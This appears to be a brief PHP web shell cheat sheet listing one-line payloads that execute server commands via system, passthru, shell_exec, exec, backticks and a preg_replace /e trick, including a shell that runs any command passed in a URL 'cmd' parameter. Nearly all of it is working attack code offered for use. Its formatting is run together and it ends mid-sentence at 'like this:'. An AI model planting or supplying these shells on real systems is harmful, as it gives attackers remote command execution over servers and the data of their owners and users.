# Execute one command<?php system("whoami"); ?># Take input from the url paramter. shell.php?cmd=whoami<?php system($_GET['cmd']); ?># The same but using passthru<?php passthru($_GET['cmd']); ?># For shell_exec to output the result you need to echo it<?php echoshell_exec("whoami");?># Exec() does not output the result without echo, and only output the last line. So not very useful!<?php echoexec("whoami");?># Instead to this if you can. It will return the output as an array, and then print it all.<?php exec("ls -la",$array); print_r($array); ?># preg_replace(). This is a cool trick<?php preg_replace('/.*/e','system("whoami");',''); ?># Using backticks<?php $output =`whoami`; echo"<pre>$output</pre>"; ?># Using backticks<?php echo`whoami`; ?>
You can then call then execute the commands like this:
